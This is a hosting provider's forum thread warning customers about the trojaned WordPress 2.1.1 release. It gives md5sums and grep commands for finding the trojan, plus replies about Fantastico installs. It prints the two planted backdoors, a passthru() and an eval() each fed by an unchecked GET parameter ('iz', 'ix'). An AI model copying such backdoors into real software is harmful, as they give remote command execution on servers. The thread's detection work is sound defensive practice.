If you use WordPress, and have downloaded and/or installed 2.1.1, you should see this:

http://wordpress.org/development/2007/03/upgrade-212/


The trojan appears to exist in the following files:

theme.php - passthru backdoor:


408 function get_theme_mcommand($mcds) {
409 passthru($mcds);
410 }

441 if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }



feed.php - eval backdoor:


84 function comment_text_phpfilter($filterdata) {
85 eval($filterdata);
86 }

149 if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }



md5sums of 2 trojaned files:


76be4c737295030a90f5d554b1c687f2 feed.php
2aa5e7dbfb354dce6e407c43b3db8f41 theme.php


Be sure to check your recent WordPress 2.1.1 installs for these, and take appropriate measures to update accordingly, as these trojans can allow for remote command execution, which is basically the equivalent of giving someone shell access to your server.

If you have any questions, please feel free to ask here.

As of this time, all managed dedicated and VDS customers have been checked, as have all shared servers (regular webhosting and reseller accounts). Emails were dispatched to any customers (or resellers if a customer of a customer) who were found to have the trojaned version of WordPress. If you have not been contacted by us and are running WordPress 2.1.1, it would be a good idea to double check your installs just to be safe.

As of this time, all managed dedicated and VDS customers have been checked, as have all shared servers (regular webhosting and reseller accounts). Emails were dispatched to any customers (or resellers if a customer of a customer) who were found to have the trojaned version of WordPress. If you have not been contacted by us and are running WordPress 2.1.1, it would be a good idea to double check your installs just to be safe.

I was told cPanel server we're not effected by this security news?

Hi Patrick,

It depends. The hacked version of WordPress works on any server that WordPress can run on, which includes servers that have cPanel installed.

That said, WordPress comes with Fantastico, if that package is enabled in your Fantastico feature set. You can see what packages are enabled in your Fantastico feature set by logging into WHM and clicking the Fantastico link near the bottom of the page.

Ultimately your best bet would be to see if the WordPress archive exists in your Fantastico directory, and if so, check the theme.php and feed.php for the backdoors, like this:

As root:

1. cd /var/netenberg/archives/fantastico_de_luxe
2. tar zxvf WordPress.tgz
3. cd WordPress/wp-includes
4. egrep 'get_theme_mcommand|comment_text_phpfilter' feed.php theme.php

If you don't get any output, the backdoors mentioned in this thread do not exist. Please let me know if this answers your questions, thanks.

I should note the above instructions apply to VDS and dedicated customers only. If you are a regular webhosting or Reseller customer, or managed VDS or dedicated customer, we have already checked the servers to include the Fantastico archives on the 2nd when this thread was posted.

According to Netenberg - the developers of Fantastico:

http://www.netenberg.com/forum/viewtopic.php?t=5562


Is the current 2.11 version on Fantastico at risk for this problem?



No. WordPress 2.1.1 was included in Fantastico over 8 days ago (http://netenberg.com/forum/viewtopic.php?t=5544). This exploit only affects the copy that was downloaded within the past 3-4 days.



I had checked their forums on the 2nd, the day the advisory was released, and there wasn't any information posted there at the time. However, it appears the information above was posted the following day, which states that the version of WordPress included with Fantastico was in fact not affected.

Well I just wanted to clarify the issue. :)